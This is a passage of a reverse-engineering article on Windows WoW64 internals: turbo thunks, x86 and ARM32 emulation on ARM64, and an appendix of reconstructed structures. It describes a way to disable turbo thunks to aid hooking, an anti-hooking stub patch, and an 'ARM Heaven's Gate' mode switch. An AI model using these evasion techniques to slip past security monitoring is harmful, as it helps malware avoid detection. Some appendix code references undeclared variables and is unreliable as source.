typedef struct _WOW64_SYSTEM_SERVICE
{
ULONG SystemCallNumber : 12;
ULONG ServiceTableIndex : 4;
ULONG TurboThunkNumber : 5; // Can hold values 0 — 31
ULONG AlwaysZero : 11;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

Let’s examine few WoW64 system calls:

NtMapViewOfSection (x64)
NtMapViewOfSection (x64)
NtWaitForSingleObject (x64)
NtWaitForSingleObject (x64)
NtDeviceIoControlFile (x64)
NtDeviceIoControlFile (x64)

Based on our new definition of WOW64_SYSTEM_SERVICE, we can conclude that:

  • NtMapViewOfSection uses turbo thunk with index 0 (TurboDispatchJumpAddressEnd)
  • NtWaitForSingleObject uses turbo thunk with index 13 (Thunk3ArgSpNSpNSpReloadState)
  • NtDeviceIoControlFile uses turbo thunk with index 27 (DeviceIoctlFile)

Let’s finally explain “turbo thunks” in proper way.

Turbo thunks are an optimalization of WoW64 subsystem — specifically on Windows x64 — that enables for particular system calls to never leave the wow64cpu.dll — the conversion of parameters and return value, and the syscall instruction itself is fully performed there. The set of functions that use these turbo thunks reveals, that they are usually very simple in terms of parameter conversion — they receive numerical values or handles.

The notation of Thunk* labels is as follows:

  • The number specifies how many arguments the function receives
  • Sp converts parameter with sign-extension
  • NSp converts parameter without sign-extension
  • ReloadState will return to the 32-bit mode using iret instead of far jump, if WOW64_CPURESERVED_FLAG_RESET_STATE is set
  • QuerySystemTimeReadWriteFileDeviceIoctlFile, … are special cases

Let’s take the NtWaitForSingleObject and its turbo thunk Thunk3ArgSpNSpNSpReloadState as an example:

  • it receives 3 parameters
  • 1st parameter is sign-extended
  • 2nd parameter isn’t sign-extended
  • 3rd parameter isn’t sign-extended
  • it can switch to 32-bit mode using iret if WOW64_CPURESERVED_FLAG_RESET_STATE is set

When we cross-check this information with its function prototype, it makes sense:

NTSTATUS
NTAPI
NtWaitForSingleObject(
_In_ HANDLE Handle,
_In_ BOOLEAN Alertable,
_In_ PLARGE_INTEGER Timeout
);

The sign-extension of HANDLE makes sense, because if we pass there an INVALID_HANDLE_VALUE, which happens to be 0xFFFFFFFF (-1) on 32-bits, we don’t want to convert this value to 0x00000000FFFFFFFF, but 0xFFFFFFFFFFFFFFFF.

On the other hand, if the TurboThunkNumber is 0, the call will end up in theTurboDispatchJumpAddressEnd which in turn calls wow64!Wow64SystemServiceEx. You can consider this case as the “slow path”.

Disabling Turbo thunks

On Windows x64, the Turbo thunk optimization can be actually disabled!

In one of the previous sections I’ve been talking about ntdll32!NtWow64CallFunction64 andwow64!Wow64CallFunctionTurboThunkControl functions. As with any other NtWow64* function, NtWow64CallFunction64 is only available in the WoW64 ntdll.dll. This function can be called with an index to WoW64 function in the Wow64FunctionDispatch64 table (you could see earlier).

The function prototype might look like this:

typedef enum _WOW64_FUNCTION {
Wow64Function64Nop,
Wow64FunctionQueryProcessDebugInfo,
Wow64FunctionTurboThunkControl,
Wow64FunctionCfgDispatchControl,
Wow64FunctionOptimizeChpeImportThunks,
} WOW64_FUNCTION;
NTSYSCALLAPI
NTSTATUS
NTAPI
NtWow64CallFunction64(
_In_ WOW64_FUNCTION Wow64Function,
_In_ ULONG Flags,
_In_ ULONG InputBufferLength,
_In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
_In_ ULONG OutputBufferLength,
_Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
_Out_opt_ PULONG ReturnLength
);

NOTE: This function prototype has been reconstructed with the help of thewow64!Wow64CallFunction64Nop function code, which just logs the parameters.

We can see that wow64!Wow64CallFunctionTurboThunkControl can be called with an index of 2. This function performs some sanity checks and then passes callswow64cpu!BTCpuTurboThunkControl(*(ULONG*)InputBuffer).

wow64cpu!BTCpuTurboThunkControl then checks the input parameter.

  • If it’s 0, it patches every target of the jump table to point to TurboDispatchJumpAddressEnd(remember, this is the target that is called when WOW64_SYSTEM_SERVICE.TurboThunkNumber is 0).
  • If it’s non-0, it returns STATUS_NOT_SUPPORTED.

This means 2 things:

  • Calling wow64cpu!BTCpuTurboThunkControl(0) disables the Turbo thunks, and every system call ends up taking the “slow path”.
  • It is not possible to enable them back.

With all this in mind, we can achieve disabling Turbo thunks by this call:

#define WOW64_TURBO_THUNK_DISABLE 0
#define WOW64_TURBO_THUNK_ENABLE 1 // STATUS_NOT_SUPPORTED 🙁
ThunkInput = WOW64_TURBO_THUNK_DISABLE;
Status = NtWow64CallFunction64(Wow64FunctionTurboThunkControl,
0,
sizeof(ThunkInput),
&ThunkInput,
0,
NULL,
NULL);

What it might be good for? I can think of 3 possible use-cases:

  • If we deploy custom wow64log.dll (explained earlier), disabling Turbo thunks guarantees that we will see every WoW64 system call in our wow64log!Wow64LogSystemService callback. We wouldn’t see such calls if the Turbo thunks were enabled, because they would take the “fast path” inside of the wow64cpu.dll where the syscall would be executed.
  • If we decide to hook Nt* functions in the native ntdll.dll, disabling Turbo thunks guarantees that for each Nt* function called in the ntdll32.dll, the correspondint Nt* function will be called in the native ntdll.dll. (This is basically the same point as the previous one.)

    NOTE: Keep in mind that this only applies on system calls, i.e. on Nt* or Zw* functions. Other functions are not called from the 32-bit ntdll.dll to the 64-bit ntdll.dll. For example, if we hooked RtlDecompressBuffer in the native ntdll.dll of the WoW64 process, it wouldn’t be called on ntdll32!RtlDecompressBuffer call. This is because the full implementaion of the Rtl*functions is already in the ntdll32.dll.

  • We can “harmlessly” patch high-word moved to the eax in every WoW64 system call stub to 0. For example we could see in NtWaitForSingleObject there is mov eax, 0D0004h. If we patched appropriate 2 bytes in that instruction so that the instruction would become mov eax, 4h, the system call would still work.This approach can be used as an anti-hooking technique — if there’s a jump at the start of the function, the patch will break it. If there’s not a jump, we just disable the Turbo thunk for this function.

x86 on ARM64

Emulation of x86 applications on ARM64 is handled by an actual binary translation. Instead of wow64cpu.dll, the xtajit.dll (probably shortcut for “x86 to ARM64 JIT”) is used for its emulation. As with other emulation DLLs, this DLL is native (ARM64).

The x86 emulation on Windows ARM64 consists also of other “XTA” components:

  • xtac.exe — XTA Compiler
  • XtaCache.exe — XTA Cache Service

Execution of x86 programs on ARM64 appears to go way behind just emulation. It is also capable of caching already binary-translated code, so that next execution of the same application should be faster. This cache is located in the Windows\XtaCache directory which contains files in format FILENAME.EXT.HASH1.HASH2.mp.N.jc. These files are then mapped to the user-mode address space of the application. If you’re asking whether you can find an actual ARM64 code in these files — indeed, you can.

The whole “XTA” and its internals are not in the focus of this article, but they would definitely deserve a separate article.

Unfortunatelly, Microsoft doesn’t provide symbols to any of these xta* DLLs or executables. But if you’re feeling adventurous, you can find some interesting artifacts, like this array of structures inside of the xtajit.dll, which contains name of the function and its pointer. There are thousands of items in this array:

BT functions (before) (ARM64)
BT functions (before) (ARM64)

With a simple Python script, we can mass-rename all functions referenced in this array:

begin = 0x01800A8C20
end = 0x01800B7B4F
struct_size = 24
ea = begin
while ea < end:
ea += struct_size
name = idc.GetString(idc.Qword(ea))
idc.MakeName(idc.Qword(ea+8), name)
view raw2_IDA_BT_rename.py hosted with ❤ by GitHub

I’d like to thank Milan Boháček for providing me this script.

BT functions (after) (ARM64)
BT functions (after) (ARM64)
BT translated function list (ARM64)
BT translated function list (ARM64)

Windows\SyCHPE32 & Windows\SysWOW64

One thing you can observe on ARM64 is that it contains two folders used for x86 emulation. The difference between them is that SyCHPE32 contains small subset of DLLs that are frequently used by applications, while contents of the SysWOW64 folder is quite identical with the content of this folder on Windows x64.

The CHPE DLLs are not pure-x86 DLLs and not even pure-ARM64 DLLs. They are “compiled-hybrid-PE”s. What does it mean? Let’s see:

NtMapViewOfSection (CHPE) (ARM64)
NtMapViewOfSection (CHPE) (ARM64)

After opening SyCHPE32\ntdll.dll, IDA will first tell us — unsurprisingly — that it cannot download PDB for this DLL. After looking at randomly chosen Nt* function, we can see that it doesn’t differ from what we would see in the SysWOW64\ntdll.dll. Let’s look at some non-Nt* function:

RtlDecompressBuffer (CHPE) (ARM64)
RtlDecompressBuffer (CHPE) (ARM64)

We can see it contains regular x86 function prologue, immediately followed by x86 function epilogue and then jump somewhere, where it looks like that there’s just garbage.

My guess is that the reason for this prologue is probably compatibility with applications that check whether some particular functions are hooked or not — by checking if the first bytes of the function contain real prologue.

NOTE: Again, if you’re feeling adventurous, you can patch FileHeader.Machine field in the PE header to IMAGE_FILE_MACHINE_ARM64 (0xAA64) and open this file in IDA. You will see a whole lot of correctly resolved ARM64 functions. Again, I’d like to thank to Milan Boháček for this tip.

If your question is “how are these images generated?”, I would answer that I don’t know, but my bet would be on some internal version of Microsoft’s C++ compiler toolchain. This idea appears to be supported by various occurences of the CHPE keyword in the ChakraCore codebase.

ARM32 on ARM64

The loop inside of the wowarmhw!BTCpuSimulate is fairly simple compared to wow64cpu.dll loop:

DECLSPEC_NORETURN
VOID
BTCpuSimulate(
VOID
)
{
NTSTATUS Status;
PCONTEXT Context;
//
// Gets WoW64 CONTEXT structure (ARM32) using
// the RtlWow64GetCurrentCpuArea() function.
//
Status = CpupGetArmContext(&Context, NULL);
if (!NT_SUCCESS(Status))
{
RtlRaiseStatus(Status);
//
// UNREACHABLE
//
return;
}
for (;;)
{
//
// Switch to ARM32 mode and run the emulation.
//
NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = TRUE;
CpupSwitchTo32Bit(Context);
NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = FALSE;
//
// When we get here, it means ARM32 code performed a system call.
// Advance instruction pointer to skip the «UND 0F8h» instruction.
//
Context->Pc += 2;
//
// Set LSB (least significat bit) if ARM32 is executing in
// Thumb mode.
//
if (Context->Cpsr & 0x20) {
Context->Pc |= 1;
}
//
// Let wow64.dll emulate the system call. R12 has the system call
// number, Sp points to the stack which contains the system call
// arguments.
//
Context->R0 = Wow64SystemServiceEx(Context->R12, Context->Sp);
}
}

CpupSwitchTo32Bit does nothing else than saving the whole CONTEXT, performing SVC 0xFFFFinstruction and then restoring the CONTEXT.

nt!KiEnter32BitMode / SVC 0xFFFF

I won’t be explaining here how system call dispatching works in the ntoskrnl.exe — Bruce Dang already did an excellent job doing it. This section is a follow up on his article, though.

SVC instruction is sort-of equivalent of SYSCALL instruction on ARM64 — it basically enters the kernel mode. But there is a small difference between SYSCALL and SVC: while on Windows x64 the system call number is moved into the eax register, on ARM64 the system call number can be encoded directly into the SVC instruction.

SVC 0xFFFF (ARM64)
SVC 0xFFFF (ARM64)

Let’s peek for a moment into the kernel to see how is this SVC instruction handled:

  • nt!KiUserExceptionHandler
    • nt!KiEnter32BitMode
KiUserExceptionHandler (ARM64)
KiUserExceptionHandler (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)

We can see that:

  • MRS X30, ELR_EL1 — current interrupt-return address (stored in ELR_EL1 system register) will be moved to the register X30 (link register — LR).
  • MSR ELR_EL1, X15 — the interrupt-return address will be replaced by value in the register X15(which is aliased to the instruction pointer register — PC — in the 32-bit mode).
  • ORR X16, X16, #0b10000 — bit [4] is being set in X16 which is later moved to the SPSR_EL1register. Setting this bit switches the execution mode to 32-bits.

Simply said, in the X15 register, there is an address that will be executed once we leave the kernel-mode and enter the user-mode — which happens with the ERET instruction at the end.

nt!KiExit32BitMode / UND #0xF8

Alright, we’re in the 32-bit ARM mode now, how exactly do we leave? Windows solves this transition via UND instruction — which is similar to the UD2 instruction on the Intel CPUs. If you’re not familiar with it, you just need to know that it is instruction that basically guarantees that it’ll throw “invalid instruction” exception which can OS kernel handle. It is defined-“undefined instruction”. Again there is the same difference between the UND and UD2 instruction in that the ARM can have any 1-byte immediate value encoded directly in the instruction.

Let’s look at the NtMapViewOfSection system call in the SysArm32\ntdll.dll:

NtMapViewOfSection (ARM64)
NtMapViewOfSection (ARM64)

Let’s peek into the kernel again:

  • nt!KiUser32ExceptionHandler
    • nt!KiFetchOpcodeAndEmulate
      • nt!KiExit32BitMode
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)

Keep in mind that meanwhile the 32-bit code is running, it cannot modify the value of the previously stored X30 register — it is not visible in 32-bit mode. It stays there the whole time. Upon UND #0xF8 execution, following happens:

  • the KiFetchOpcodeAndEmulate function moves value of X30 into X24 register (not shown on the screenshot).
  • AND X19, X16, #0xFFFFFFFFFFFFFFC0 — bit [4] (among others) is being cleared in the X19register, which is later moved to the SPSR_EL1 register. Clearing this bit switches the execution mode back to 64-bits.
  • KiExit32BitMode then moves the value of X24 register into the ELR_EL1 register. That means when this function finishes its execution, the ERET brings us back to the 64bit code, right after the SVC 0xFFFF instruction.

NOTE: It can be noticed that Windows uses UND instruction for several purposes. Common example might also be UND #0xFE which is used as a breakpoint instruction (equivalent of __debugbreak() / int3)

As you could spot, 3 kernel transitions are required for emulation of the system call (SVC 0xFFFF, system call itself, UND 0xF8). This is because on ARM there doesn’t exist a way how to switch between 32-bit and 64-bit mode only in user-mode.

If you’re looking for “ARM Heaven’s Gate” — this is it. Put whatever function address you like into the X15 register and execute SVC 0xFFFF. Next instruction will be executed in the 32-bit ARM mode, starting with that address. When you feel you’d like to come back into 64-bit mode, simply execute UND #0xF8 and your execution will continue with the next instruction after the SVC 0xFFFF.

Appendix

////////////////////////////////////////////////////////////////////////////////
// General definitions.
////////////////////////////////////////////////////////////////////////////////
//
// Context flags.
// winnt.h (Windows SDK)
//
#define CONTEXT_i386 0x00010000L
#define CONTEXT_AMD64 0x00100000L
#define CONTEXT_ARM 0x00200000L
#define CONTEXT_ARM64 0x00400000L
//
// Machine type.
// winnt.h (Windows SDK)
//
#define IMAGE_FILE_MACHINE_TARGET_HOST 0x0001 // Useful for indicating we want to interact with the host and not a WoW guest.
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
#define IMAGE_FILE_MACHINE_ARMNT 0x01c4 // ARM Thumb-2 Little-Endian
#define IMAGE_FILE_MACHINE_ARM64 0xAA64 // ARM64 Little-Endian
#define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64 // Hybrid PE (defined in ntimage.h (WDK))
////////////////////////////////////////////////////////////////////////////////
// ntoskrnl.exe
////////////////////////////////////////////////////////////////////////////////
typedef struct _PS_NTDLL_EXPORT_ITEM {
PCSTR RoutineName;
PVOID RoutineAddress;
} PS_NTDLL_EXPORT_ITEM, *PPS_NTDLL_EXPORT_ITEM;
PS_NTDLL_EXPORT_ITEM NtdllExports[] = {
//
// 19 exports on x64
// 14 exports on ARM64
//
};
PVOID PsWowX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowX86Exports[] = {
{ «LdrInitializeThunk«,
&PsWowX86SharedInformation[SharedNtdll32LdrInitializeThunk] },
{ «KiUserExceptionDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserExceptionDispatcher] },
{ «KiUserApcDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserApcDispatcher] },
{ «KiUserCallbackDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserCallbackDispatcher] },
{ «RtlUserThreadStart«,
&PsWowX86SharedInformation[SharedNtdll32RtlUserThreadStart] },
{ «RtlpQueryProcessDebugInformationRemote«,
&PsWowX86SharedInformation[SharedNtdll32pQueryProcessDebugInformationRemote] },
{ «LdrSystemDllInitBlock«,
&PsWowX86SharedInformation[SharedNtdll32LdrSystemDllInitBlock] },
{ «RtlpFreezeTimeBias«,
&PsWowX86SharedInformation[SharedNtdll32RtlpFreezeTimeBias] },
};
#ifdef _M_ARM64
PVOID PsWowArm32SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowArm32Exports[] = {
//
// …
//
};
PVOID PsWowAmd64SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowAmd64Exports[] = {
//
// …
//
};
PVOID PsWowChpeX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowChpeX86Exports[] = {
//
// …
//
};
#endif // _M_ARM64
//
// …
//
typedef struct _PS_NTDLL_EXPORT_INFORMATION {
PPS_NTDLL_EXPORT_ITEM NtdllExports;
SIZE_T Count;
} PS_NTDLL_EXPORT_INFORMATION, *PPS_NTDLL_EXPORT_INFORMATION;
//
// RTL_NUMBER_OF(NtdllExportInformation)
// == 6
// == (SYSTEM_DLL_TYPE)PsSystemDllTotalTypes
//
PS_NTDLL_EXPORT_INFORMATION NtdllExportInformation[PsSystemDllTotalTypes] = {
{ NtdllExports, RTL_NUMBER_OF(NtdllExports) },
{ NtdllWowX86Exports, RTL_NUMBER_OF(NtdllWowX86Exports) },
#ifdef _M_ARM64
{ NtdllWowArm32Exports, RTL_NUMBER_OF(NtdllWowArm32Exports) },
{ NtdllWowAmd64Exports, RTL_NUMBER_OF(NtdllWowAmd64Exports) },
{ NtdllWowChpeX86Exports, RTL_NUMBER_OF(NtdllWowChpeX86Exports) },
#endif // _M_ARM64
//
// { NULL, 0 } for the rest…
//
};
typedef struct _PS_SYSTEM_DLL_INFO {
//
// Flags.
// Initialized statically.
//
USHORT Flags;
//
// Machine type of this WoW64 NTDLL.
// Initialized statically.
// Examples:
// — IMAGE_FILE_MACHINE_I386
// — IMAGE_FILE_MACHINE_ARMNT
//
USHORT MachineType;
//
// Unused, always 0.
//
ULONG Reserved1;
//
// Path to the WoW64 NTDLL.
// Initialized statically.
// Examples:
// — «\\SystemRoot\\SysWOW64\\ntdll.dll»
// — «\\SystemRoot\\SysArm32\\ntdll.dll»
//
UNICODE_STRING Ntdll32Path;
//
// Image base of the DLL.
// Initialized at runtime by PspMapSystemDll.
// Equivalent of:
// RtlImageNtHeader(BaseAddress)->
// OptionalHeader.ImageBase;
//
PVOID ImageBase;
//
// Contains DLL name (such as «ntdll.dll» or
// «ntdll32.dll») before runtime initialization.
// Initialized at runtime by MmMapViewOfSectionEx,
// called from PspMapSystemDll.
//
union {
PVOID BaseAddress;
PWCHAR DllName;
};
//
// Unused, always 0.
//
PVOID Reserved2;
//
// Section relocation information.
//
PVOID SectionRelocationInformation;
//
// Unused, always 0.
//
PVOID Reserved3;
} PS_SYSTEM_DLL_INFO, *PPS_SYSTEM_DLL_INFO;
typedef struct _PS_SYSTEM_DLL {
//
// _SECTION* object of the DLL.
// Initialized at runtime by PspLocateSystemDll.
//
union {
EX_FAST_REF SectionObjectFastRef;
PVOID SectionObject;
};
//
// Push lock.
//
EX_PUSH_LOCK PushLock;
//
// System DLL information.
// This part is returned by PsQuerySystemDllInfo.
//
PS_SYSTEM_DLL_INFO SystemDllInfo;
} PS_SYSTEM_DLL, *PPS_SYSTEM_DLL;
////////////////////////////////////////////////////////////////////////////////
// ntdll.dll
////////////////////////////////////////////////////////////////////////////////
ULONG
RtlpArchContextFlagFromMachine(
_In_ USHORT MachineType
)
/*++
Routine description:
This routine translates architecture-specific CONTEXT
flag to the machine type.
Arguments:
MachineType — One of IMAGE_FILE_MACHINE_* values.
Return Value:
Context flag.
Note:
RtlpArchContextFlagFromMachine can be found only in
ntoskrnl.exe symbols, but from ntdll.dll disassembly
it is obvious that this function is present there
as well (probably __forceinline’d, or used as a macro).
—*/
{
switch (MachineType)
{
case IMAGE_FILE_MACHINE_I386:
return CONTEXT_i386;
case IMAGE_FILE_MACHINE_AMD64:
return CONTEXT_AMD64;
case IMAGE_FILE_MACHINE_ARMNT:
return CONTEXT_ARM;
case IMAGE_FILE_MACHINE_ARM64:
return CONTEXT_ARM64;
default:
return 0;
}
}
ULONG
RtlpGetLegacyContextLength(
_In_ ULONG ArchContextFlag,
_Out_opt_ PULONG SizeOfContext,
_Out_opt_ PULONG AlignOfContext
)
/*++
Routine description:
This routine determines size and alignment of the architecture-
-specific CONTEXT structure.
Arguments:
ArchContextFlag — Architecture-specific CONTEXT flag.
SizeOfContext — Receives sizeof(CONTEXT).
AlignOfContext — Receives __alignof(CONTEXT).
Return Value:
Alignment of the CONTEXT structure.
Note:
You can find corresponding DECLSPEC_ALIGN specifiers
for each CONTEXT structure in the winnt.h (Windows SDK).
By WOW64_CONTEXT_* here is meant an original CONTEXT
structure for the specific architecture (as CONTEXT
structures for other architectures are not available,
because it is selected during compile-time).
—*/
{
ULONG SizeOf = 0;
ULONG AlignOf = 0;
switch (ArchContextFlag)
{
case CONTEXT_i386:
SizeOf = sizeof(WOW64_CONTEXT_i386);
AlignOf = __alignof(WOW64_CONTEXT_i386); // 4
break;
case CONTEXT_AMD64:
SizeOf = sizeof(WOW64_CONTEXT_AMD64);
AlignOf = __alignof(WOW64_CONTEXT_AMD64); // 16
break;
case CONTEXT_ARM:
SizeOf = sizeof(WOW64_CONTEXT_ARM);
AlignOf = __alignof(WOW64_CONTEXT_ARM); // 8
break;
case CONTEXT_ARM64:
SizeOf = sizeof(WOW64_CONTEXT_ARM64);
AlignOf = __alignof(WOW64_CONTEXT_ARM64); // 16
break;
}
if (SizeOfContext) {
*SizeOfContext = SizeOf;
}
if (AlignOfContext) {
*AlignOfContext = AlignOf;
}
return AlignOf;
}
PULONG
RtlpGetContextFlagsLocation(
_In_ PCONTEXT_UNION Context,
_In_ ULONG ArchContextFlag
)
/*++
Routine description:
This routine returns pointer to the the «ContextFlags»
member of the CONTEXT structure.
Arguments:
Context — Architecture-specific CONTEXT structure.
ArchContextFlag — Architecture-specific CONTEXT flag.
Return Value:
Pointer to the the «ContextFlags» member.
—*/
{
//
// ContextFlags is always the first member of the
// CONTEXT struct — except for AMD64.
//
switch (ArchContextFlag)
{
case CONTEXT_i386:
return &Context->X86.ContextFlags; // Context + 0x00
case CONTEXT_AMD64:
return &Context->X64.ContextFlags; // Context + 0x30
case CONTEXT_ARM:
return &Context->ARM.ContextFlags; // Context + 0x00
case CONTEXT_ARM64:
return &Context->ARM64.ContextFlags; // Context + 0x00
default:
//
// Assume first member (Context + 0x00).
//
return (PULONG)Context;
}
}
//
// Architecture-specific WoW64 structure,
// holding the machine type and context
// structure.
//
#define WOW64_CPURESERVED_FLAG_RESET_STATE 1
typedef struct _WOW64_CPURESERVED {
USHORT Flags;
USHORT MachineType;
//
// CONTEXT has different alignment for
// each architecture and its location
// is determined at runtime (see
// RtlWow64GetCpuAreaInfo below).
//
// CONTEXT Context;
// CONTEXT_EX ContextEx;
//
} WOW64_CPURESERVED, *PWOW64_CPURESERVED;
typedef struct _WOW64_CPU_AREA_INFO {
PCONTEXT_UNION Context;
PCONTEXT_EX ContextEx;
PVOID ContextFlagsLocation;
PWOW64_CPURESERVED CpuReserved;
ULONG ContextFlag;
USHORT MachineType;
} WOW64_CPU_AREA_INFO, *PWOW64_CPU_AREA_INFO;
NTSTATUS
RtlWow64GetCpuAreaInfo(
_In_ PWOW64_CPURESERVED CpuReserved,
_In_ ULONG Reserved,
_Out_ PWOW64_CPU_AREA_INFO CpuAreaInfo
)
/*++
Routine description:
This routine returns architecture- and WoW64-specific
information based on the CPU-reserved region. It is
used mainly for fetching MachineType and the pointer
to the architecture-specific CONTEXT structure (which
is part of the WOW64_CPURESERVED structure). Because
the CONTEXT structure has different size and alignment
for each architecture, the pointer must be obtained
dynamically.
Arguments:
CpuReserved — WoW64 CPU-reserved region, usually located
at NtCurrentTeb()->TlsSlots[/* 1 */ WOW64_TLS_CPURESERVED]
Reserved — Unused. All callers set this argument to 0.
CpuAreaInfo — Receives the CPU-area information.
Return Value:
STATUS_SUCCESS — on success
STATUS_INVALID_PARAMETER — if CpuReserved contains invalid MachineType
*/
{
ULONG ContextFlag;
ULONG SizeOfContext;
ULONG AlignOfContext;
//
// In the ntdll.dll, this call is probably inlined, because
// RtlpArchContextFlagFromMachine symbol is not present there.
//
ContextFlag = RtlpArchContextFlagFromMachine(CpuReserved->MachineType);
if (!ContextFlag) {
return STATUS_INVALID_PARAMETER;
}
RtlpGetLegacyContextLength(ContextFlag, &SizeOfContext, &AlignOfContext);
//
// CpuAreaInfo->Context = &CpuReserved->Context;
// CpuAreaInfo->ContextEx = &CpuReserved->ContextEx;
//
CpuAreaInfo->Context = ALIGN_UP_POINTER_BY(
(PUCHAR)CpuArea + sizeof(WOW64_CPU_AREA),
AlignOfContext
);
CpuAreaInfo->ContextEx = ALIGN_UP_POINTER_BY(
(PUCHAR)Context + SizeOfContext + sizeof(CONTEXT_EX),
sizeof(PVOID)
);
CpuAreaInfo->ContextFlagsLocation = ContextFlagsLocation;
CpuAreaInfo->CpuArea = CpuArea;
CpuAreaInfo->ContextFlag = ContextFlag;
CpuAreaInfo->MachineType = CpuReserved->MachineType;
return STATUS_SUCCESS;
}
////////////////////////////////////////////////////////////////////////////////
// wow64.dll
////////////////////////////////////////////////////////////////////////////////
//
// WOW64INFO, based on:
// wow64t.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64t.h#L269)
//
#define WOW64_CPUFLAGS_MSFT64 0x00000001
#define WOW64_CPUFLAGS_SOFTWARE 0x00000002
typedef struct _WOW64INFO {
ULONG NativeSystemPageSize;
ULONG CpuFlags;
ULONG Wow64ExecuteFlags;
ULONG Unknown1;
USHORT NativeMachineType;
USHORT EmulatedMachineType;
} WOW64INFO, *PWOW64INFO;
//
// Thread Local Storage (TLS) support. TLS slots are statically allocated.
// wow64tls.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64tls.h#L23)
// Note: Not all fields probably matches their names on Windows 10.
//
#define WOW64_TLS_STACKPTR64 0 // contains 64-bit stack ptr when simulating 32-bit code
#define WOW64_TLS_CPURESERVED 1 // per-thread data for the CPU simulator
#define WOW64_TLS_INCPUSIMULATION 2 // Set when inside the CPU
#define WOW64_TLS_TEMPLIST 3 // List of memory allocated in thunk call.
#define WOW64_TLS_EXCEPTIONADDR 4 // 32-bit exception address (used during exception unwinds)
#define WOW64_TLS_USERCALLBACKDATA 5 // Used by win32k callbacks
#define WOW64_TLS_EXTENDED_FLOAT 6 // Used in ia64 to pass in floating point
#define WOW64_TLS_APCLIST 7 // List of outstanding usermode APCs
#define WOW64_TLS_FILESYSREDIR 8 // Used to enable/disable the filesystem redirector
#define WOW64_TLS_LASTWOWCALL 9 // Pointer to the last wow call struct (Used when wowhistory is enabled)
#define WOW64_TLS_WOW64INFO 10 // Wow64Info address (structure shared between 32-bit and 64-bit code inside Wow64).
#define WOW64_TLS_INITIAL_TEB32 11 // A pointer to the 32-bit initial TEB
#define WOW64_TLS_PERFDATA 12 // A pointer to temporary timestamps used in perf measurement
#define WOW64_TLS_DEBUGGER_COMM 13 // Communicate with 32bit debugger for event notification
#define WOW64_TLS_INVALID_STARTUP_CONTEXT 14 // Used by IA64 to indicate an invalid startup context. After startup, it stores a pointer to the context.
#define WOW64_TLS_SLIST_FAULT 15 // Used to retry RtlpInterlockedPopEntrySList faults
#define WOW64_TLS_UNWIND_NATIVE_STACK 16 // Forces an unwind of the native 64-bit stack after an APC
#define WOW64_TLS_APC_WRAPPER 17 // Holds the Wow64 APC jacket routine
#define WOW64_TLS_IN_SUSPEND_THREAD 18 // Indicates the current thread is in the middle of NtSuspendThread. Used by software CPUs.
#define WOW64_TLS_MAX_NUMBER 19 // Maximum number of TLS slot entries to allocate
typedef struct _WOW64_ERROR_CASE {
ULONG Case;
NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;
typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
//
// struct _KSERVICE_TABLE_DESCRIPTOR {
//
// //
// // Pointer to a system call table (array of function pointers).
// //
//
// PULONG_PTR Base;
//
// //
// // Pointer to a system call count table.
// // This field has been set only on checked (debug) builds,
// // where the Count (with the corresponding system call index)
// // has been incremented with each system call.
// // On non-checked builds it is set to NULL.
// //
//
// PULONG Count;
//
// //
// // Maximum number of items in the system call table.
// // In ntoskrnl.exe it corresponds with the actual number
// // of system calls. In wow64.dll it is set to 4096.
// //
//
// ULONG Limit;
//
// //
// // Pointer to a system call argument table.
// // The elements in this table actually contain how many
// // bytes on the stack are assigned to the function parameters
// // for a particular system call.
// // On 32-bit systems, if you divide this number by 4, you’ll
// // get the the number of arguments that the system call expects.
// //
//
// PUCHAR Number;
// };
//
KSERVICE_TABLE_DESCRIPTOR Descriptor;
//
// Extended fields of the WoW64 servie table:
// Wow64HandleSystemServiceError
//
WOW64_ERROR_CASE ErrorCaseDefault;
PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;
#define WOW64_NTDLL_SERVICE_INDEX 0
#define WOW64_WIN32U_SERVICE_INDEX 1
#define WOW64_KERNEL32_SERVICE_INDEX 2
#define WOW64_USER32_SERVICE_INDEX 3
#define WOW64_SERVICE_TABLE_MAX 4
WOW64_SERVICE_TABLE_DESCRIPTOR ServiceTables[WOW64_SERVICE_TABLE_MAX];
typedef struct _WOW64_LOG_SERVICE
{
PVOID Reserved;
PULONG Arguments;
ULONG ServiceTable;
ULONG ServiceNumber;
NTSTATUS Status;
BOOLEAN PostCall;
} WOW64_LOG_SERVICE, *PWOW64_LOG_SERVICE;
NTSTATUS
Wow64HandleSystemServiceError(
_In_ NTSTATUS ExceptionStatus,
_In_ PWOW64_LOG_SERVICE LogService
)
/*++
Routine description:
This routine transforms exception from native system
call to WoW64-compatible NTSTATUS.
Arguments:
ExceptionStatus — NTSTATUS raised from executing system call.
LogService — Information about the WoW64 system call.
Return Value:
Transformed NTSTATUS.
—*/
{
PWOW64_SERVICE_TABLE_DESCRIPTOR ServiceTable;
PWOW64_ERROR_CASE ErrorCaseTable;
ULONG ErrorCase;
NTSTATUS TransformedStatus;
ErrorCaseTable = ServiceTables[LogService->ServiceTable].ErrorCase;
